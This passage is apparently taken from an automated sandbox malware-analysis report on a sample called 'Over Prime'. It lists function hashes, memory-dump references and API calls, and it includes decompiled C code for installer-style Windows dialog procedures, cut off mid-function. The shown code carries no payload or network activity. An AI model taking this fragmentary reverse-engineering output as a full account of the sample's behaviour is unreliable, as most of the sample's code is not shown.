Opcode Fuzzy Hash: 2e060a9ee7bede9b06d6b66964d0fd8ca74f1cd07773467a224877ee541856ac
Instruction Fuzzy Hash: D7416931504349EFCF308E398D453DB37E66F822A0F558A2ADCD8DB255D7318A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38AC4 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153f16eadad54371e9e71eb97fbf494552bb2b8e892def50f4a3a48c941c9a06
Instruction ID: 844581a5ff3a2d9ba9118b45ae73b142021bf00041b5383334590cae9153f938
Opcode Fuzzy Hash: 153f16eadad54371e9e71eb97fbf494552bb2b8e892def50f4a3a48c941c9a06
Instruction Fuzzy Hash: 54410431604359EFCF308E399D457DB37E6AF82790F558A2ADC88DB254D7318A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38ADC Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7660be48d48df23c9eb8a10fa315005e1840e551bf39ed6756a287b32b9ff12c
Instruction ID: 6cc79bcc9f62bf71784b8a2af4792e92376707825f9c3a55ea0dae539a41c7b2
Opcode Fuzzy Hash: 7660be48d48df23c9eb8a10fa315005e1840e551bf39ed6756a287b32b9ff12c
Instruction Fuzzy Hash: 93414831504319EFCB308E398D453DB37E66F82260F55862ADCC8DB254D3318A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38AD4 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f0778df9f2602882bd5fdf7479342f90e25613b91fb815859edd65404ff778
Instruction ID: fadd35393d921f02047031cd09b8fcbed28575a584b79bf5ad50062828364fe0
Opcode Fuzzy Hash: e5f0778df9f2602882bd5fdf7479342f90e25613b91fb815859edd65404ff778
Instruction Fuzzy Hash: 54412531604349EFCF308E399D453DB37E6AF82690F558A2ADCC8DB214D7318A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38AE4 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb376affaf52efb76e86e2ad7e4d91635379f3d8a59f4d829e19ef08e7e243a7
Instruction ID: ad3b34ae9c7fcaee7cf8afa685898cc1dccb9079ea90176ed9540a3587736c96
Opcode Fuzzy Hash: cb376affaf52efb76e86e2ad7e4d91635379f3d8a59f4d829e19ef08e7e243a7
Instruction Fuzzy Hash: C9312535614719EFCB209E398D457DB37E76F82390FA5852ADCC897214D7328A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C38B70 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8b307e7ae26560fda144ca52e3a1f4d541f85758f4f86f82deebe62bfeba1d
Instruction ID: f296a58d1e088e70c823b4229d8dda5759bb9c4eff78750bb18c6911cfabe5d1
Opcode Fuzzy Hash: fd8b307e7ae26560fda144ca52e3a1f4d541f85758f4f86f82deebe62bfeba1d
Instruction Fuzzy Hash: 19314735608345DFCB209E398D413DB37E76F82290F558A2E9CC8D7265D732898ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 02C38B78 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8b0b1295ac917cc8921b659af2ca3cda365fa6353a3e9dc8e5ae5811162636
Instruction ID: 86eb016fc3c1a9c83c9cff193ff3925ad87c3aeb0e29104d78e803e53fe58da9
Opcode Fuzzy Hash: 7a8b0b1295ac917cc8921b659af2ca3cda365fa6353a3e9dc8e5ae5811162636
Instruction Fuzzy Hash: 33315775608305DFCF208E398D413DB37E66F822A0F658A1E9CD9D7295D7318A85CB43

Uniqueness

Uniqueness Score: -1.00%

Function 02C38B88 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1abd8495e0190b8a53fa755dfdac7579d46d4b946783210a2df888979a1d635a
Instruction ID: de03d70f7289a6acf0e7aefbc6f15391892b3a320c22b9b8680e02f0ae83bc4f
Opcode Fuzzy Hash: 1abd8495e0190b8a53fa755dfdac7579d46d4b946783210a2df888979a1d635a
Instruction Fuzzy Hash: 7F316735619345DFCB208E394D453DB37E76F82290F65891E9CC8D7225D7318A89CB03

Uniqueness

Uniqueness Score: -1.00%

Function 02C38B98 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3722290198a535bd0157e9681bac07776fec2a8ee15c7d6db6f5e259582a0a36
Instruction ID: c03c30f33a22e010d5b10fee487cc1e3801f1a783ddd108094bc26f73d24e9d9
Opcode Fuzzy Hash: 3722290198a535bd0157e9681bac07776fec2a8ee15c7d6db6f5e259582a0a36
Instruction Fuzzy Hash: B3313635519345DFCB208E354D453DB77E76F82290F668A1E9CC897125D7318986CB43

Uniqueness

Uniqueness Score: -1.00%

Function 02C43CD7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27236b074b921be90a1beea96a5fbb825dfe8b2273a0857b43e8f9c0d7c75034
Instruction ID: 27e983fdeb112003044e9b25d1e2c6802ec2ec4f726cb7630fe65c20cfc22367
Opcode Fuzzy Hash: 27236b074b921be90a1beea96a5fbb825dfe8b2273a0857b43e8f9c0d7c75034
Instruction Fuzzy Hash: E611B23161538ADFCB34DF18C9A4BD673A1EF96360F5502ADEC488B250D7309A00CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02C43469 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5dc7c91116dca0d101dad0e19b7791753d67c2b021cff13f4d23183f0be30b4
Instruction ID: 0ea8f75a5816070ea809d0b3dfa176f2104e3cf3ece815e4462eb297719f7c31
Opcode Fuzzy Hash: c5dc7c91116dca0d101dad0e19b7791753d67c2b021cff13f4d23183f0be30b4
Instruction Fuzzy Hash: B9B01234211E40CFCF41CF08C590F4173B0F744741F0104C0E8108BB11C328E800CE00

Uniqueness

Uniqueness Score: -1.00%

Function 02C40357 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfdb43571b16ec2793758cb115f91b51e366a11989b1e9e9d7d0a2ad2970215
Instruction ID: 2d8b0bbeae8bb01e09779e36d12cf092f0901b3a5aeda50809fd3fe804252fe7
Opcode Fuzzy Hash: 4bfdb43571b16ec2793758cb115f91b51e366a11989b1e9e9d7d0a2ad2970215
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x51456a
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054a2
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

, xrefs: 004054D4
N, xrefs: 0040519B
M, xrefs: 004050BA
jEQ, xrefs: 004054A2

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$jEQ
API String ID: 2564846305-3163874221
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x51100c
						_t29 = _t69 + 0x14; // 0x511020
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
